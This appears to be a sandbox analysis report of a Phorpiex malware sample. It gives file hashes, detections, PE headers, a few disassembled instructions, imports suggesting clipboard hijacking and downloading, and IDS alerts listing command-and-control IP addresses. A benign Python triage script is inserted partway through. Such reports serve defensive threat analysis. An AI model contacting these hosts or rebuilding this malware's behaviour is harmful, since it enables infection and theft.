                                            Size (bytes):7936
                                            Entropy (8bit):7.977073369015467
                                            Encrypted:false
                                            SSDEEP:96:laZmbVGtzVkzC6UDj1leru2yQOfggZ+IQFTkTlYZqdPjYScySGXWi9J6qHX8K6q8:laSiVcwDjDe1psYU6ShvGi9Yqx6qbu1
                                            MD5:E4BA3C41B28A42D02E385EE30669598D
                                            SHA1:B5D014A790826C0157FC6CFCCAFF942766F78382
                                            SHA-256:0177C6245F875C9E65824FE76D24D1D9F13BDBF766E0C275E2CAB80A98412D41
                                            SHA-512:1AFB3912A5C7A59D2C4FD9FBCBB0A4A1D4E55E063AB76707FFC8B28F1C8C235A28732042D2CCCC413043FB5B5AD749AC374CF232F1C6E1B8844D056F644770E2
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Windows\sysmablsvr.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):12288
                                            Entropy (8bit):5.391249729205469
                                            Encrypted:false
                                            SSDEEP:192:hPgQD/GBqBCQJvtWojFJxT4SzxmFhql2:hgQD/GPQJv8ojFpx2
                                            MD5:8242045FF6B7BED00C8A94C77193F2DE
                                            SHA1:EA6E335F88B9D14E722BFF8298469FE0D6C17199
                                            SHA-256:7217DE31983E9E1E310D0BB28D8EDC2F7D6E69F2ABF32704B5AB74072AB48F74
                                            SHA-512:DE3FA7426D115EE96C5FF328D31A3DE476742B1CF9C7956F56C675BC9E94C175DB32AEFF6235C59D37DF51B3B0DAC79E002A97527FA0E4D02EEE3BA4C4C2A39C
                                            Malicious:true
                                            Process:C:\Windows\sysmablsvr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):7936
                                            Entropy (8bit):7.9773160117550175
                                            Encrypted:false
                                            SSDEEP:192:eCcU4lTpyjoqU4TWTeguLt/1tS1o6Tqu37b7WPkE7qHDHyo:eCcVLIowLt/1STqu37HI1I
                                            MD5:CDC59EC342E22103257F213FED156807
                                            SHA1:0B7F95AB9FA24A7CEA2E34B9AFF3845A8923F96F
                                            SHA-256:DDF959FF63893AC8EB8ED9F877448072FE7B5FAE741B3AF3D5DB5B06AC154678
                                            SHA-512:E215E2933636DF7B5EECD21DD64A90DE8E06D5BC41CE71673263EC36073AD926C3D3F6910B969ECCF8E02458B0D580248DF3C07E01D6BA9E6B1F7B3F14A34BB1
                                            Malicious:true
                                            Process:C:\Windows\sysmablsvr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):8200
                                            Entropy (8bit):7.978897056764554
                                            Encrypted:false
                                            SSDEEP:192:kD4d5ObbY6sB1iNUlT+w5hzHv2ojIsITGKov+KjvZT:ZYmqNUlyw5hzHv2fTGKuTrZT
                                            MD5:B4824500B417A4BEF5A7F356A7E59228
                                            SHA1:5D2B41DDB0FB14AF16D6F5434477CCE841FCCB61
                                            SHA-256:5E611106EBE3444BAFC26DD6D3C9DA9EC52114D95121D72C37A00D76D729B281
                                            SHA-512:74A3BEF099FF33F00151AB07534F66CFD8408F156E308063CD1FE4C0D3CA9DD104619FC1E5E654D3E85D4897BF68F015144969CA17BFD04186724C1A9CCD4D0A
                                            Malicious:true
                                            Process:C:\Windows\sysmablsvr.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):7680
                                            Entropy (8bit):5.432926826222673
                                            Encrypted:false
                                            SSDEEP:96:e2b/BPrdRyDN5t9LT+YmAWPzjK8Jz4FJxSE4y2FFp3C7tCEIr:e2b/BPuPJ+eoRJ0FJx34ymFpcI
                                            MD5:AC0A159A6C219E2CEA55DCC77AB6E337
                                            SHA1:3E0E7C2E758DAE61EDF9F27860693A1910BA71AA
                                            SHA-256:E97496328C0D205A7ECB4ADE75C1555FC7787EC54334468739C5C5CFD6566B3C
                                            SHA-512:4F29A8D75D71D553166F817474F316A80BE4FB39D8B7B38336B172AD4C428BBC76B461AC02BEFCA4B15CA42562CDB783A27B02D5EB8C1AF2944E0D4E2ACADC6A
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 75%
                                            Joe Sandbox View:
                                            • Filename: file.exe, Detection: malicious
                                            • Filename: SecuriteInfo.com.Trojan.DownLoader46.2135.4279.14770.exe, Detection: malicious
                                            Process:C:\Windows\sysmablsvr.exe
                                            File Type:OpenPGP Secret Key
                                            Category:dropped
                                            Size (bytes):4064
                                            Entropy (8bit):4.769574018574847
                                            Encrypted:false
                                            SSDEEP:96:VAQBF9/MCiPprtJ4AygurETyHA5s/omF6MZnHl50W2Q1NZoQDl2:W2ACiBr4jETx5s/om6wlCW2QvBl2
                                            MD5:8F585CFD4BCB25D0C06778EF82F37804
                                            SHA1:3E7F6D52F672A3F17D7DA0D2F141FCB44D621B0A
                                            SHA-256:9FE63F3BB2D7A142C208FE8E9978B8CC2A7DE22CF5256FD60581BB461614D1BE
                                            SHA-512:057A5C7985A9CCAB37258B5F49A7BFE814B82E4BCDDEF200AB1EE19E78BC61C173821059E0B410CB3CB44C2DD55ADC72300ED8B2908DA596D64EB8AD36D1532A
                                            Malicious:false
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):90112
                                            Entropy (8bit):6.352081778201283
                                            Encrypted:false
                                            SSDEEP:1536:wL0IGzbFmav82XwudP6+0MTqEjXm/D5AKHK:c0poOfP6+JuEjaaKHK
                                            MD5:ABABCA6D12D96E8DD2F1D7114B406FAE
                                            SHA1:DCD9798E83EC688AACB3DE8911492A232CB41A32
                                            SHA-256:A992920E64A64763F3DD8C2A431A0F5E56E5B3782A1496DE92BC80EE71CCA5BA
                                            SHA-512:B7FC70C176BDC74CF68B14E694F3E53142E64D39BD6D3E0F2E3A74CE3178EA606F92F760D21DB69D72AE6677545A47C7BF390FB65CD5247A48E239F6AE8F7B8F
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\sysmablsvr.exe, Author: Joe Security
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 84%
                                            Joe Sandbox View:
                                            • Filename: SecuriteInfo.com.Trojan.DownLoader46.63386.25844.4041.exe, Detection: malicious
                                            • Filename: Setup.exe, Detection: malicious
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.qj)..9)..9)..9 ..9...9Q..8+..9..B9+..9..@9(..9...9+..9..r9-..9)..9...9..d9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L....|if.............................u............@..........................................................................*.......................................................................................... ............................text............................... ..`.rdata..b:.......<..................@..@.data....G...@...6...*..............@...................................................................................................................................................................................................................................................................................................................................................................................
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):6.352081778201283
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:file.exe
                                            File size:90'112 bytes
                                            MD5:ababca6d12d96e8dd2f1d7114b406fae
                                            SHA1:dcd9798e83ec688aacb3de8911492a232cb41a32
                                            SHA256:a992920e64a64763f3dd8c2a431a0f5e56e5b3782a1496de92bc80ee71cca5ba
                                            SHA512:b7fc70c176bdc74cf68b14e694f3e53142e64d39bd6d3e0f2e3a74ce3178ea606f92f760d21db69d72ae6677545a47c7bf390fb65cd5247a48e239f6ae8f7b8f
                                            SSDEEP:1536:wL0IGzbFmav82XwudP6+0MTqEjXm/D5AKHK:c0poOfP6+JuEjaaKHK
                                            TLSH:64931A42F590A47FF9EA86FA91F64E68542CBFB4234844E39250659B87207FEFC35027
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.qj)..9)..9)..9 ..9...9Q..8+..9..B9+..9..@9(..9...9+..9..r9-..9)..9...9..d9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9...............
                                            Icon Hash:90cececece8e8eb0
                                            Entrypoint:0x407500
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x66697CAF [Wed Jun 12 10:47:11 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:0
                                            File Version Major:5
                                            File Version Minor:0
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:0
                                            Import Hash:2e23372b9869b74c90162a6fda4f170d
                                            Instruction
                                            push ebp
                                            mov ebp, esp
                                            sub esp, 00000FF0h
                                            push 000007D0h
                                            call dword ptr [0041013Ch]
                                            push 0041431Ch
                                            push 00000000h
                                            push 00000000h
                                            call dword ptr [00410098h]
                                            mov dword ptr [ebp-00000E5Ch], eax
                                            call dword ptr [0041009Ch]
                                            cmp eax, 000000B7h
                                            jne 00007F3DCD20D74Ah
                                            push 00000000h
                                            call dword ptr [004100A0h]
                                            mov dword ptr [ebp-0000062Ch], 00000000h
                                            mov dword ptr [ebp-0000041Ch], 00000000h
                                            mov dword ptr [ebp-0000083Ch], 00000001h
                                            mov dword ptr [ebp-00000210h], 00000004h
                                            push 00000105h
                                            push 00417B18h
                                            push 00000000h
                                            call dword ptr [004100B0h]
                                            push 00417B18h
                                            call dword ptr [0041017Ch]
                                            mov dword ptr [ebp-0000020Ch], eax
                                            push 00417B18h
                                            push 004112DCh
                                            lea eax, dword ptr [ebp-00000208h]
                                            push eax
                                            call dword ptr [0041019Ch]
                                            add esp, 0Ch
                                            lea ecx, dword ptr [ebp-00000208h]
                                            push ecx
                                            call dword ptr [004100C0h]
                                            push 00000104h
                                            lea edx, dword ptr [ebp-00000E58h]
                                            push edx
                                            push 00411304h
                                            call dword ptr [004100A4h]
                                            Programming Language:
                                            • [ C ] VS2005 build 50727
                                            • [IMP] VS2005 build 50727
                                            • [ C ] VS2008 SP1 build 30729
                                            • [C++] VS2008 SP1 build 30729
                                            • [LNK] VS2008 SP1 build 30729
                                            Name | Virtual Address | Virtual Size | Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x12a94 | 0x104 | .rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x10000 | 0x320 | .rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                            .text | 0x1000 | 0xe8aa | 0xea00 | de57a23428cadf6f1aed6b6601be700a | False | 0.4650106837606838 | data | 6.114014927367993 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata | 0x10000 | 0x3a62 | 0x3c00 | a61ba0e131cbec528ddecb1edc07279e | False | 0.4317708333333333 | data | 5.405015238701291 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data | 0x14000 | 0x47d8 | 0x3600 | c04ca37b6d5b2a25385e3343eab0a917 | False | 0.21412037037037038 | data | 4.536418070021025 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
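Added example, not part of the Joe Sandbox report: a small Python triage of the static PE values listed above (image base, entrypoint, section table, data directories). It maps RVAs to sections the way the "Is in Section" column does, confirms the entrypoint lands in an executable section, and flags the usual section-table oddities (entropy near 8, RWX sections, raw/virtual size mismatches). The section alignment of 0x1000 is an assumption; the report does not print it, but every section VA is 0x1000-aligned. The entropy values are the per-section figures from the table, truncated to three decimals.

```python
"""Static PE section triage over the values printed in the report above."""

IMAGE_BASE = 0x400000
ENTRYPOINT = 0x407500
SECTION_ALIGNMENT = 0x1000  # assumed: not in the report, but all section VAs are 0x1000-aligned

# (name, virtual address, virtual size, raw size, entropy, characteristics) from the section table
SECTIONS = [
    (".text",  0x1000,  0xe8aa, 0xea00, 6.114, {"CODE", "EXECUTE", "READ"}),
    (".rdata", 0x10000, 0x3a62, 0x3c00, 5.405, {"INITIALIZED_DATA", "READ"}),
    (".data",  0x14000, 0x47d8, 0x3600, 4.536, {"INITIALIZED_DATA", "READ", "WRITE"}),
]

# (rva, size) of the non-empty data directories; zero-sized entries are kept to show they are skipped
DIRECTORIES = {
    "EXPORT": (0x0, 0x0),
    "IMPORT": (0x12a94, 0x104),
    "BASERELOC": (0x0, 0x0),
    "IAT": (0x10000, 0x320),
}


def align_up(value, alignment):
    """Round value up to the next multiple of alignment."""
    return (value + alignment - 1) // alignment * alignment


def section_for_rva(rva, sections=SECTIONS):
    """Return the name of the section whose mapped range contains rva, or None.

    The loader maps each section over [VA, VA + VirtualSize rounded up to the
    section alignment), so that is the range tested here, not the raw size.
    """
    for name, va, vsize, _raw, _entropy, _chars in sections:
        if va <= rva < va + align_up(vsize, SECTION_ALIGNMENT):
            return name
    return None


def check_entrypoint(entry=ENTRYPOINT, base=IMAGE_BASE, sections=SECTIONS):
    """Return (section name, is_executable) for the entrypoint VA."""
    name = section_for_rva(entry - base, sections)
    executable = any(s[0] == name and "EXECUTE" in s[5] for s in sections)
    return name, executable


def locate_directories(dirs=DIRECTORIES, sections=SECTIONS):
    """Map each non-empty data directory to the section that fully contains it (None if it straddles)."""
    located = {}
    for name, (rva, size) in dirs.items():
        if size == 0:
            continue
        first = section_for_rva(rva, sections)
        last = section_for_rva(rva + size - 1, sections)
        located[name] = first if first == last else None
    return located


def triage_sections(sections=SECTIONS, packed_entropy=7.0):
    """Return [(section, [findings])] for sections that show something worth a second look."""
    findings = []
    for name, _va, vsize, raw, entropy, chars in sections:
        flags = []
        if vsize > raw:
            # zero-filled tail: normal for .data/.bss, suspicious for a code section
            flags.append(f"virtual size exceeds raw size (zero-filled tail of 0x{vsize - raw:x} bytes)")
        if raw > align_up(vsize, SECTION_ALIGNMENT):
            flags.append("raw data larger than mapped size (unmapped slack on disk)")
        if entropy >= packed_entropy:
            flags.append(f"high entropy {entropy:.2f}: likely packed or encrypted")
        if "EXECUTE" in chars and "WRITE" in chars:
            flags.append("writable and executable section")
        if flags:
            findings.append((name, flags))
    return findings


if __name__ == "__main__":
    print("entrypoint:", check_entrypoint())
    print("directories:", locate_directories())
    for name, flags in triage_sections():
        print(name, "->", "; ".join(flags))
```

For this sample the only finding is the zero-filled tail of `.data`, which is what a C runtime's uninitialised globals look like; none of the sections reaches packer-level entropy, consistent with the report's 6.35 for the whole file and with the plain-text import table that follows.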
                                            DLL | Import
                                            WS2_32.dll | gethostname, recvfrom, setsockopt, closesocket, htons, shutdown, WSAStartup, connect, WSAWaitForMultipleEvents, listen, WSASocketA, WSACreateEvent, WSAGetOverlappedResult, WSAEventSelect, WSAEnumNetworkEvents, WSAGetLastError, WSASend, WSARecv, WSACloseEvent, accept, getpeername, getsockname, inet_addr, gethostbyname, inet_ntoa, socket, bind, sendto, ioctlsocket, recv, send
                                            SHLWAPI.dll | StrStrIA, StrCmpNW, StrStrW, PathFileExistsW, StrChrA, PathFindFileNameW, StrCmpNIA, PathMatchSpecW
                                            urlmon.dll | URLDownloadToFileW
                                            WININET.dll | HttpOpenRequestA, HttpSendRequestA, InternetConnectA, InternetCloseHandle, DeleteUrlCacheEntry, InternetReadFile, InternetOpenA, InternetCrackUrlA, HttpAddRequestHeadersA, HttpQueryInfoA, InternetOpenUrlA, DeleteUrlCacheEntryW, InternetOpenUrlW, InternetOpenW
                                            ntdll.dll | strlen, isdigit, isalpha, memcpy, memset, NtQueryVirtualMemory, RtlUnwind, _chkstk, _aulldiv, wcslen, wcscmp, _allshl, _aullshr, strstr, strcmp, memmove, memcmp, RtlTimeToSecondsSince1980, NtQuerySystemTime, mbstowcs
                                            msvcrt.dll | srand, rand, _vscprintf
                                            KERNEL32.dll | GetQueuedCompletionStatus, PostQueuedCompletionStatus, GetSystemInfo, lstrcmpW, SetEvent, CreateProcessW, GetLocaleInfoA, DeleteCriticalSection, GetCurrentThread, GetThreadPriority, SetThreadPriority, GetCurrentProcess, DuplicateHandle, IsBadReadPtr, InterlockedExchangeAdd, InterlockedIncrement, WaitForSingleObject, InterlockedDecrement, InterlockedExchange, HeapFree, HeapValidate, HeapReAlloc, GetProcessHeaps, HeapCreate, HeapSetInformation, GetCurrentProcessId, HeapAlloc, CreateMutexA, GetLastError, ExitProcess, ExpandEnvironmentStringsW, CreateEventA, CreateThread, GetModuleFileNameW, GetVolumeInformationW, GetDiskFreeSpaceExW, SetFileAttributesW, DeleteFileW, CopyFileW, lstrcmpiW, CreateDirectoryW, FindFirstFileW, CreateIoCompletionPort, MoveFileExW, FindNextFileW, FindClose, RemoveDirectoryW, GetLogicalDrives, GetDriveTypeW, QueryDosDeviceW, lstrcpyW, WriteFile, FlushFileBuffers, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, CreateFileW, CreateFileMappingW, MapViewOfFile, GlobalUnlock, GlobalLock, GlobalAlloc, lstrlenA, lstrlenW, lstrcpynW, MultiByteToWideChar, ExitThread, GetTickCount, Sleep, GetModuleHandleW, CloseHandle, UnmapViewOfFile, GetFileSize
                                            USER32.dll | RegisterClassExW, CreateWindowExW, GetMessageA, TranslateMessage, wsprintfW, DefWindowProcA, ChangeClipboardChain, RegisterRawInputDevices, GetClipboardData, DispatchMessageA, EmptyClipboard, SetClipboardData, CloseClipboard, IsClipboardFormatAvailable, SendMessageA, SetWindowLongW, SetClipboardViewer, GetWindowLongW, wsprintfA, wvsprintfA, OpenClipboard
                                            ADVAPI32.dll | CryptReleaseContext, RegQueryValueExW, RegOpenKeyExW, RegOpenKeyExA, RegCreateKeyExW, CryptAcquireContextW, CryptGenRandom, RegCloseKey, RegSetValueExW, RegSetValueExA
                                            SHELL32.dll | ShellExecuteW
                                            ole32.dll | CoInitializeEx, CoUninitialize, CoInitialize, CoCreateInstance
                                            OLEAUT32.dll | SysFreeString, SysAllocString
                                            Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                            2024-09-17T23:09:15.563777+0200 | 2837677 | ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) | 1 | 185.215.113.66 | 80 | 192.168.2.4 | 49793 | TCP
                                            2024-09-17T23:09:16.259431+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49730 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:09:16.259431+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49730 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:09:17.984779+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49732 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:09:17.984779+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49732 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:09:18.095591+0200 | 2044077 | ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC | 1 | 192.168.2.4 | 59145 | 84.54.122.14 | 40500 | UDP
                                            2024-09-17T23:09:23.161855+0200 | 2044077 | ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC | 1 | 192.168.2.4 | 59145 | 178.151.4.209 | 40500 | UDP
                                            2024-09-17T23:09:23.386341+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49734 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:09:23.386341+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49734 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:09:25.665035+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49734 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:09:25.665035+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49734 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:09:27.916077+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49734 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:09:27.916077+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49734 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:09:30.163885+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49734 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:09:30.163885+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49734 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:09:32.414765+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49734 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:09:32.414765+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49734 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:09:33.235648+0200 | 2044077 | ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC | 1 | 192.168.2.4 | 59145 | 2.189.25.176 | 40500 | UDP
                                            2024-09-17T23:09:37.130578+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49738 | 77.91.77.92 | 80 | TCP
                                            2024-09-17T23:09:37.130578+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49738 | 77.91.77.92 | 80 | TCP
                                            2024-09-17T23:09:38.241849+0200 | 2044077 | ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC | 1 | 192.168.2.4 | 59145 | 86.102.56.226 | 40500 | UDP
                                            2024-09-17T23:09:40.900663+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49741 | 77.91.77.92 | 80 | TCP
                                            2024-09-17T23:09:40.900663+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49741 | 77.91.77.92 | 80 | TCP
                                            2024-09-17T23:09:43.241812+0200 | 2044077 | ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC | 1 | 192.168.2.4 | 59145 | 2.190.124.23 | 40500 | UDP
                                            2024-09-17T23:09:44.587314+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49743 | 77.91.77.92 | 80 | TCP
                                            2024-09-17T23:09:44.587314+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49743 | 77.91.77.92 | 80 | TCP
                                            2024-09-17T23:09:48.275269+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49744 | 77.91.77.92 | 80 | TCP
                                            2024-09-17T23:09:48.275269+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49744 | 77.91.77.92 | 80 | TCP
                                            2024-09-17T23:09:52.012408+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49745 | 77.91.77.92 | 80 | TCP
                                            2024-09-17T23:09:52.012408+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49745 | 77.91.77.92 | 80 | TCP
                                            2024-09-17T23:09:55.742140+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49746 | 77.91.77.92 | 80 | TCP
                                            2024-09-17T23:09:55.742140+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49746 | 77.91.77.92 | 80 | TCP
                                            2024-09-17T23:09:58.255064+0200 | 2044077 | ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC | 1 | 192.168.2.4 | 59145 | 105.106.52.97 | 40500 | UDP
                                            2024-09-17T23:09:59.523347+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49748 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:09:59.523347+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49748 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:10:01.236543+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49749 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:10:01.236543+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49749 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:10:03.308803+0200 | 2044077 | ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC | 1 | 192.168.2.4 | 59145 | 217.30.170.10 | 40500 | UDP
                                            2024-09-17T23:10:07.663501+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49749 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:10:07.663501+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49749 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:10:08.302854+0200 | 2044077 | ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC | 1 | 192.168.2.4 | 59145 | 217.30.162.37 | 40500 | UDP
                                            2024-09-17T23:10:10.219426+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49751 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:10:10.219426+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49751 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:10:13.319220+0200 | 2044077 | ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC | 1 | 192.168.2.4 | 59145 | 81.195.238.130 | 40500 | UDP
                                            2024-09-17T23:10:16.643936+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49752 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:10:16.846309+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49751 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:10:16.846309+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49751 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:10:19.905577+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49751 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:10:19.905577+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49751 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:10:22.671072+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49754 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:10:22.671072+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49754 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:10:23.335541+0200 | 2044077 | ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC | 1 | 192.168.2.4 | 59145 | 46.100.121.146 | 40500 | UDP
                                            2024-09-17T23:10:25.439810+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49756 | 91.202.233.141 | 80 | TCP
